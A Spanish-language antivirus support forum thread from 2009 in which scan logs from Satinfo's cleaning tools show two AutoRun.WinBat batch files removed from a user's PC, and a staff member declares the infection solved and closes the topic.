F:\DESKTOP.INI --> Eliminado (Fichero Complementario).
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 14:04:53 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\Documents and Settings\Alfredo\WINDOWS.BAT --> Eliminado, AutoRun.WinBat
C:\RECYCLER\S-1-5-21-4002053713-390158461-902960635-1005\DC1.BAT --> Eliminado, AutoRun.WinBat
Nº Total de Directorios: 10664
Nº Total de Ficheros: 82047
Nº de Ficheros Analizados: 26206
Nº de Ficheros Infectados: 2
Nº de Ficheros Limpiados: 2
(24-7-2009 14:17:17 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 8
Nº de Ficheros Analizados: 3
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:17:25 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
Nº Total de Directorios: 5
Nº Total de Ficheros: 7
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:18:00) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Acción Directa):
(24-7-2009 14:18:03) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
Nº Total de Directorios: 10664
Nº Total de Ficheros: 82052
Nº de Ficheros Analizados: 24635
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:19:57) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Exploración):
Explorando "E:\"
Nº Total de Directorios: 3
Nº Total de Ficheros: 8
Nº de Ficheros Analizados: 3
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
(24-7-2009 14:20:02) (GMT)
EliTriIP v5.97 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 20 de Julio del 2009)
---------------------------------------------
Lista de Acciones (por Exploración):
Explorando "F:\"
Nº Total de Directorios: 5
Nº Total de Ficheros: 7
Nº de Ficheros Analizados: 0
Nº de Ficheros Infectados: 0
Nº de Ficheros Limpiados: 0
- msc hotline sat
- Mensajes: 93500
- Registrado: 09 Mar 2004, 20:39
- Ubicación: BARCELONA (ESPAÑA)
- Contactar:
Re: Windows.bat
Pues muy bien !:
ya creo que puedes olvidar el virusillo !:wink:
Y sobre antivirus, ninguno va a conocer los nuevos virus que aparecen a diario, aunque con la heuristica puedan pedir muestras de sospechosos (variantes de los ya conocidos)
Por ello mira lo que decimos al respecto:
https://foros.zonavirus.com/viewtopic.php?f=8&t=28758
Y dando por solucionado el Tema, procedemos a cerrarlo
Si nos necesitas de nuevo, ya sabes donde estamos
saludos
ms, 24-7-2009
[quote](24-7-2009 14:04:41 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Acción Directa):
E:\DESKTOP.INI --> Eliminado (Fichero Complementario).
F:\DESKTOP.INI --> Eliminado (Fichero Complementario).
Eliminadas las Paginas de Inicio y de Busqueda del IE
Eliminados Ficheros Temporales del IE
(24-7-2009 14:04:53 (GMT))
EliStartPage v19.10 (c)2009 S.G.H. / Satinfo S.L. (Actualizado el 24 de Julio del 2009)
--------------------------------------------------
Lista de Acciones (por Exploración):
Explorando "C:\"
C:\Documents and Settings\Alfredo\WINDOWS.BAT --> Eliminado, AutoRun.WinBat
C:\RECYCLER\S-1-5-21-4002053713-390158461-902960635-1005\DC1.BAT --> Eliminado, AutoRun.WinBat[/quote]
ya creo que puedes olvidar el virusillo !
Y sobre antivirus, ninguno va a conocer los nuevos virus que aparecen a diario, aunque con la heuristica puedan pedir muestras de sospechosos (variantes de los ya conocidos)
Por ello mira lo que decimos al respecto:
Y dando por solucionado el Tema, procedemos a cerrarlo
Si nos necesitas de nuevo, ya sabes donde estamos
saludos
ms, 24-7-2009

Antes de preguntar - Normas Basicas - Mensajes Privados - Repetir Temas - Continuar Temas - Titulos del Tema - Antivirus Online